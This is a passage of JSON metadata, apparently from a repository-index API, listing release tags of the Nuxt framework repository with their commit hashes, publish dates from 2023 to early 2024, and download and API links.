","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html